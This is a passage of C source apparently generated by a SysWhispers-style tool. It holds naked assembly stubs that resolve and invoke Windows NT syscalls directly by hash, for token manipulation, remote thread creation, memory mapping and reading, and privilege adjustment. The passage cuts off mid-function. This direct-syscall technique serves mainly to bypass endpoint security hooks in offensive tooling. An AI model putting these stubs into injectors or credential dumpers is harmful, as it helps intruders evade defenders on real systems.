__declspec(naked) NTSTATUS NtSetInformationProcess_(
    IN HANDLE DeviceHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    IN PVOID ProcessInformation,
    IN ULONG Length)
{
    __asm {
        push 0x1D9F320C
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryInformationToken(
    IN HANDLE TokenHandle,
    IN TOKEN_INFORMATION_CLASS TokenInformationClass,
    OUT PVOID TokenInformation,
    IN ULONG TokenInformationLength,
    OUT PULONG ReturnLength)
{
    __asm {
        push 0x27917136
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtDuplicateToken(
    IN HANDLE ExistingTokenHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN BOOLEAN EffectiveOnly,
    IN TOKEN_TYPE TokenType,
    OUT PHANDLE NewTokenHandle)
{
    __asm {
        push 0x099C8384
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NTAPI NtSetInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    IN PVOID ThreadInformation,
    IN ULONG ThreadInformationLength)
{
    __asm {
        push 0x1ABE5F87
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateDirectoryObjectEx(
    OUT PHANDLE DirectoryHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN HANDLE ShadowDirectoryHandle,
    IN ULONG Flags)
{
    __asm {
        push 0xBCBD62EA
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateSymbolicLinkObject(
    OUT PHANDLE LinkHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PUNICODE_STRING LinkTarget)
{
    __asm {
        push 0x8AD1BA6D
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenSymbolicLinkObject(
    OUT PHANDLE LinkHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
    __asm {
        push 0x8C97980F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQuerySymbolicLinkObject(
    IN HANDLE LinkHandle,
    IN OUT PUNICODE_STRING LinkTarget,
    OUT PULONG ReturnedLength OPTIONAL)
{
    __asm {
        push 0xA63A8CA7
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateSection(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PLARGE_INTEGER MaximumSize OPTIONAL,
    IN ULONG SectionPageProtection,
    IN ULONG AllocationAttributes,
    IN HANDLE FileHandle OPTIONAL)
{
    __asm {
        push 0xF06912F9
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenThreadToken(
    IN HANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN BOOLEAN OpenAsSelf,
    OUT PHANDLE TokenHandle)
{
    __asm {
        push 0x73A33918
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateTransaction(
    OUT PHANDLE TransactionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN LPGUID Uow OPTIONAL,
    IN HANDLE TmHandle OPTIONAL,
    IN ULONG CreateOptions OPTIONAL,
    IN ULONG IsolationLevel OPTIONAL,
    IN ULONG IsolationFlags OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL,
    IN PUNICODE_STRING Description OPTIONAL)
{
    __asm {
        push 0x7CAB5EFB
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryInformationFile(
    IN HANDLE FileHandle,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    OUT PVOID FileInformation,
    IN ULONG Length,
    IN FILE_INFORMATION_CLASS FileInformationClass)
{
    __asm {
        push 0x38985C1E
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtMakeTemporaryObject(
    IN HANDLE Handle)
{
    __asm {
        push 0x84DF4D82
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateKey(
    OUT PHANDLE KeyHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN ULONG TitleIndex,
    IN PUNICODE_STRING Class OPTIONAL,
    IN ULONG CreateOptions,
    OUT PULONG Disposition OPTIONAL)
{
    __asm {
        push 0xA1B2860C
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtSetValueKey(
    IN HANDLE KeyHandle,
    IN PUNICODE_STRING ValueName,
    IN ULONG TitleIndex OPTIONAL,
    IN ULONG Type,
    IN PVOID SystemData,
    IN ULONG DataSize)
{
    __asm {
        push 0x0A1F2D80
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtQueryWnfStateNameInformation(
    IN PVOID StateName,
    IN ULONG NameInfoClass,
    IN PVOID ExplicitScope OPTIONAL,
    OUT PVOID InfoBuffer,
    IN ULONG InfoBufferSize)
{
    __asm {
        push 0x14823613
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtUpdateWnfStateData(
    IN PVOID StateName,
    IN PVOID Buffer OPTIONAL,
    IN ULONG Length OPTIONAL,
    IN PCWNF_TYPE_ID TypeId OPTIONAL,
    IN PVOID ExplicitScope OPTIONAL,
    IN WNF_CHANGE_STAMP MatchingChangeStamp,
    IN ULONG CheckStamp)
{
    __asm {
        push 0xE63DF28A
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenEvent(
    OUT PHANDLE EventHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes)
{
    __asm {
        push 0x32A83D3A
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtAlpcConnectPort(
    OUT PHANDLE PortHandle,
    IN PUNICODE_STRING PortName,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
    IN ULONG Flags,
    IN PSID RequiredServerSid OPTIONAL,
    IN OUT PVOID ConnectionMessage OPTIONAL,
    IN OUT PULONG BufferLength OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL)
{
    __asm {
        push 0x6AF3595C
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtAlpcSendWaitReceivePort(
    IN HANDLE PortHandle,
    IN ULONG Flags,
    IN PPORT_MESSAGE SendMessage OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,
    OUT PPORT_MESSAGE ReceiveMessage OPTIONAL,
    IN OUT PSIZE_T BufferLength OPTIONAL,
    IN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,
    IN PLARGE_INTEGER Timeout OPTIONAL)
{
    __asm {
        push 0xE830236E
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateThreadEx(
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ProcessHandle,
    IN PVOID StartRoutine,
    IN PVOID Argument OPTIONAL,
    IN ULONG CreateFlags,
    IN SIZE_T ZeroBits,
    IN SIZE_T StackSize,
    IN SIZE_T MaximumStackSize,
    IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL)
{
    __asm {
        push 0x113F55E3
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtDeleteKey(
    IN HANDLE KeyHandle)
{
    __asm {
        push 0x6BDA0E04
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtPrivilegeCheck(
    IN HANDLE ClientToken,
    IN OUT PPRIVILEGE_SET RequiredPrivileges,
    OUT PBOOL Result)
{
    __asm {
        push 0x12B1DE10
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtCreateEvent(
    OUT PHANDLE EventHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN EVENT_TYPE EventType,
    IN BOOLEAN InitialState)
{
    __asm {
        push 0x10893520
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtTerminateThread(
    IN HANDLE ThreadHandle,
    IN NTSTATUS ExitStatus)
{
    __asm {
        push 0x381B3AB5
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS _NtFsControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG FsControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength)
{
    __asm {
        push 0x20C6D09C
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtGetContextThread(
    IN HANDLE ThreadHandle,
    IN OUT PCONTEXT ThreadContext)
{
    __asm {
        push 0xBA9EF43C
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtSetContextThread(
    IN HANDLE ThreadHandle,
    IN PCONTEXT Context)
{
    __asm {
        push 0xCB668D44
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtResumeThread(
    IN HANDLE ThreadHandle,
    IN OUT PULONG PreviousSuspendCount OPTIONAL)
{
    __asm {
        push 0x1339598F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtDelayExecution(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER DelayInterval)
{
    __asm {
        push 0xB6EB75BA
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtGetNextThread(
    IN HANDLE ProcessHandle,
    IN HANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Flags,
    OUT PHANDLE NewThreadHandle)
{
    __asm {
        push 0x1BB0D9EF
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS _NtQueryInformationThread(
    IN HANDLE ThreadHandle,
    IN THREADINFOCLASS ThreadInformationClass,
    OUT PVOID ThreadInformation,
    IN ULONG ThreadInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
    __asm {
        push 0x0ACD84E7
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtOpenThread(
    OUT PHANDLE ThreadHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __asm {
        push 0x36960437
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID BaseAddress,
    IN ULONG ZeroBits,
    IN SIZE_T CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Win32Protect)
{
    __asm {
        push 0x7A2D5C79
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtUnmapViewOfSection(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress)
{
    __asm {
        push 0xCA1ACC8F
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

__declspec(naked) NTSTATUS NtImpersonateThread(
    IN HANDLE ThreadHandle,
    IN HANDLE ThreadToImpersonate,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService)
{
    __asm {
        push 0x0C26D619
        call SW3_GetSyscallAddress
        pop ebx
        push eax
        push ebx
        call SW2_GetSyscallNumber
        add esp, 4
        pop ebx
        mov edx, esp
        sub edx, 4
        call ebx
        ret
    }
}

#elif defined(__GNUC__)

__declspec(naked) BOOL local_is_wow64(void)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov rax, 0 \n"
        "ret \n"
    );
#else
    asm(
        SET_SYNTAX
        "mov eax, fs:[0xc0] \n"
        "test eax, eax \n"
        "jne wow64 \n"
        "mov eax, 0 \n"
        "ret \n"
        "wow64: \n"
        "mov eax, 1 \n"
        "ret \n"
    );
#endif
}

__declspec(naked) PVOID getIP(void)
{
#ifdef _WIN64
    asm(
    SET_SYNTAX
    "mov rax, [rsp] \n"
    "ret \n"
    );
#else
    __asm__(
    SET_SYNTAX
    "mov eax, [esp] \n"
    "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenProcess(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PVOID ClientId OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xCD9B2A0F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xCD9B2A0F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtGetNextProcess(
    IN HANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN ULONG HandleAttributes,
    IN ULONG Flags,
    OUT PHANDLE NewProcessHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xFFBF1A2F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xFFBF1A2F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtReadVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    OUT PVOID Buffer,
    IN SIZE_T BufferSize,
    OUT PSIZE_T NumberOfBytesRead OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x118B7567 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x118B7567 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtClose(
    IN HANDLE Handle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x2252D33F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x2252D33F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtOpenProcessToken(
    IN HANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    OUT PHANDLE TokenHandle)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x8FA915A2 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x8FA915A2 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryInformationProcess(
    IN HANDLE ProcessHandle,
    IN PROCESSINFOCLASS ProcessInformationClass,
    OUT PVOID ProcessInformation,
    IN ULONG ProcessInformationLength,
    OUT PULONG ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xBDBCBC20 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xBDBCBC20 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtQueryVirtualMemory(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress,
    IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
    OUT PVOID MemoryInformation,
    IN SIZE_T MemoryInformationLength,
    OUT PSIZE_T ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0393E980 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0393E980 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtAdjustPrivilegesToken(
    IN HANDLE TokenHandle,
    IN BOOLEAN DisableAllPrivileges,
    IN PTOKEN_PRIVILEGES NewState OPTIONAL,
    IN ULONG BufferLength,
    OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,
    OUT PULONG ReturnLength OPTIONAL)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x17AB1B32 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x17AB1B32 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID * BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PSIZE_T RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0595031B \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
